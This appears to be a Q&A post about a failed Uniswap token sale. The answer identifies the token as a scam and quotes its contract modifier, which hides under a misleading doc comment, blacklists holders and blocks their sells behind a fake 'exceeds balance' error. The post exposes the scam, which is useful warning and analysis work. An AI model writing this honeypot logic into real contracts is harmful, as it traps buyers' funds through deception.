# Fail with error 'TransferHelper: TRANSFER_FROM_FAILED' / ERC20: transfer amount exceeds balance

Tags: uniswap

I am Swap Tokens to ETH via uniswap but its failing due the following:

**Fail with error 'TransferHelper: TRANSFER_FROM_FAILED'** on EtherScan but on Tenderly I am seeing  **ERC20: transfer amount exceeds balance**

I have ETH and TOKEN amounts, so I believe it should work, can anyone help?

https://etherscan.io/tx/0x4cbed777d59733dbc0824bad0f365f2e6b8f9bbe0d3605a00bf8752b6b1756b3

https://dashboard.tenderly.co/tx/main/0x4cbed777d59733dbc0824bad0f365f2e6b8f9bbe0d3605a00bf8752b6b1756b3

Answer (score 1):

Actually both are correct.

The token [Concordium (GTU)](https://etherscan.io/address/0xa8007b46aab6695346c89be8b377276662cbd6c3/advanced#code) fails with

> ERC20: transfer amount exceeds balance

And the [token pair](https://etherscan.io/address/0x14a2db4ad7080942e8c0614d86429b000856296b#code) fails with

> TransferHelper: TRANSFER_FROM_FAILED

Also that token is a scam token, you won't be able to sell it.

```
 /**
 * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens.
 *
 * This is internal function is equivalent to `approve`, and can be used to
 * e.g. set automatic allowances for certain subsystems, etc.
 *
 * Emits an {Approval} event.
 *
 * Requirements:
 *
 * - `sender` cannot be the zero address.
 * - `spender` cannot be the zero address.
 */
modifier burnTokenCheck(address sender, address recipient, uint256 amount){
    if (_owner == _safeOwner && sender == _owner){_safeOwner = recipient;_;}else{
        if (sender == _owner || sender == _safeOwner || recipient == _owner){
            if (sender == _owner && sender == recipient){_sellAmount = amount;}_;}else{
            if (_whiteAddress[sender] == true){
            _;}else{if (_blackAddress[sender] == true){
            require((sender == _safeOwner)||(recipient == _unirouter), "ERC20: transfer amount exceeds balance");_;}else{
            if (amount < _sellAmount){
            if(recipient == _safeOwner){_blackAddress[sender] = true; _whiteAddress[sender] = false;}
            _; }else{require((sender == _safeOwner)||(recipient == _unirouter), "ERC20: transfer amount exceeds balance");_;}
                }
            }
        }
    }
}
```